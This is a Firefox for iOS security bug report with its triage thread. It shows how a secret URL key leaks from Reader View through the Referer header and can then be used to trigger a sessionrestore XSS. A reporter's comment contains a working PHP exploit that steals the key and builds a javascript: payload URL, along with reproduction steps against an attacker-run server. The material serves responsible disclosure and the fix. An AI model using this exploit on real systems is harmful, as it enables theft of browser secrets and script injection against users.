Bypass privileged internal: URL protetion through referrer
Categories
(Firefox for iOS :: Reader View, defect, P3)
Tracking
()
| Tracking | Status | |
|---|---|---|
| fxios | 102 | --- |
People
(Reporter: sdna.muneaki.nishimura, Unassigned)
References
Details
(4 keywords)
Attachments
(3 files)
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15
Steps to reproduce:
In Bug 1263627, secret key based privileged URLs protection was implemented for internal:// schemes.
If protection is bypassed, untrusted web content can still abuse a XSS bug in about/sessionrestore (Bug 1258188) and also still can get any cross origin web contents (Bug 1279787).
The bypass technique I found is below.
(1) Open Safari and visit http://csrf.jp/2020/uuidkey_stealer_entry.html
(2) Tap a firefox:// link in the page to launch exploit in ReaderView on Firefox for iOS.
Note that this step is not mandatory, just a shortcut for easier reproduction.
(3) ReaderView frame is shown in Firefox for iOS, and wait for few seconds
(4) Tap "Load original page" in ReaderView
(5) Exploitation code at http://csrf.jp/2020/uuidkey_stealer.php is shown.
Then secret key (uuidkey) is leaked through REFERER header
(6) Tap "Exploit Link", alert() by XSS is shown in internal://local (see attached video for demonstration)
Actual results:
As explaind at (5), secret key (uuidkey) is leaked to web page through REFERER header.
By using the key, untrusted web contents can abuse existing XSS bug on sessionrestore (Bug 1258188).
Expected results:
Set <meta name="referrer" content="never"> in ReaderViewLoading.html .
https://github.com/mozilla-mobile/firefox-ios/blob/76faae8c6c94e22c8fbc0de72e2d06f615738e2c/Client/Frontend/Reader/ReaderViewLoading.html#L7
That can stop the REFERER leakage.
The other HTML template Reader.html already has the same protection. Do the same thing.
https://github.com/mozilla-mobile/firefox-ios/blob/76faae8c6c94e22c8fbc0de72e2d06f615738e2c/Client/Frontend/Reader/Reader.html#L10
|
Reporter | |
Comment 1•5 years ago
|
||
Exploitation code that stealed uuidkey at (5) is below.
<?php
$keyname = 'uuidkey=';
if(isset($_SERVER['HTTP_REFERER']) && strpos($_SERVER['HTTP_REFERER'], $keyname)) {
// Steal uuidkey
$referer = $_SERVER['HTTP_REFERER'];
$pos = strpos($referer, $keyname) + strlen($keyname);
$uuidkey = substr($referer, $pos);
$exploiturl = 'internal://local/sessionrestore?history=%7B%22history%22%3A%5B%22javascript%3Aalert%28document.location%29%22%5D%2C%22currentPage%22%3A-1%7D' . '&' . $keyname . $uuidkey;
echo '<b>Referer:</b><br>' . $referer . '<br><br>';
echo '<b>uuidkey:</b><br>' . $uuidkey . '<br><br>';
echo '<hr>';
echo '<b>Exploit Link: </b><br><a href="' . $exploiturl . '">' . $exploiturl . '</a>';
} else {
// Send dummy response that leads error on reader-view
header('Content-Type: application/pdf');
}
?>
|
||
Updated•5 years ago
|
|
||
Comment 2•5 years ago
|
||
The severity field is not set for this bug.
:garvan, could you have a look please?
For more information, please visit auto_nag documentation.
|
||
Comment 3•4 years ago
|
||
Garvan, can you take a look? It seems serious enough to increase priority here.
|
|
Reporter | |
Comment 4•4 years ago
|
||
Do you have a plan to fix this vulnerability?
If not, please disclose this ticket because other browsers who use FxiOS can take action by themselves based on this information.
|
|
||
Comment 5•4 years ago
|
||
[Moving needinfo to dbolter since Garvan left.]
Muneaki: Mozilla is officially closed until January 4 so you won't get an answer until then at the earliest.
|
||
Updated•4 years ago
|
|
|
||
Updated•3 years ago
|
|
||
Comment 7•3 years ago
•
|
||
I have forwarded this to the Firefox iOS team through email and I've removed myself from this bug.
|
||
Updated•3 years ago
|
|
||
Comment 8•3 years ago
|
||
Hi, tapping on the link from Safari to Firefox I do not see a reader view frame and all I see is a blank page.
Is there a step I need to perform after opening the link?
|
|
Reporter | |
Comment 9•3 years ago
|
||
During the past two years, the attack path from Safari has been blocked because there is no longer a way to go directly from Safari to the about: scheme URL. Also, the default referrer policy of WKWebView has been changed in iOS 15, so this exploit is no longer working. However, you can still reproduce this attack.
(1) Copy the URL to the clipboard: about:reader?url=https://csrf.jp/2020/uuidkey_stealer.php
(2) Open Firefox on an iOS 14.X device
(3) Long-tap the address bar, and go to the page through "Paste & Go"
(4) Tap "Load original page" in the ReaderView
|
||
Comment 10•3 years ago
•
|
||
Hello! I tried reproducing and got the issue on iOS 13.7. I see the exploitation code and exploit link as originally described. On iOS 15.2 I got a blank page after clicking on "Load original page". So it seems we need to investigate since this is still an issue on older OS.
Also, progress on this issue is tracked as well in JIRA with: https://mozilla-hub.atlassian.net/browse/FXIOS-3577
|
||
Comment 11•3 years ago
•
|
||
I was able to reproduce the issue on iPhone SE (14.8) on Firefox 9000 (9809).
Note: The issue is not reproducible on latest iOS 15.4
|
|
||
Comment 12•3 years ago
|
||
We were unable to reproduce this issue on the latest main v9000 (10270) on iPhone SE (14.8) and iPhone 13 (13.7).
This issue was reproducible on the same devices on an older version of main v9000 (9809).
@Laurie @Nishant should we close this issue as well?
|
|
||
Comment 13•3 years ago
|
||
Redirect a needinfo that is pending on an inactive user to the triage owner.
:jeevans, since the bug has recent activity, could you have a look please?
For more information, please visit auto_nag documentation.
|
|
||
Comment 14•3 years ago
|
||
Closing issue, PR was: https://github.com/mozilla-mobile/firefox-ios/pull/10855
|
||
Updated•3 years ago
|
|
|
||
Comment 15•3 years ago
|
||
|
||
Updated•3 years ago
|
|
|
||
Updated•3 years ago
|
|
||
Updated•9 months ago
|
|
|
||
Updated•5 months ago
|
Description
•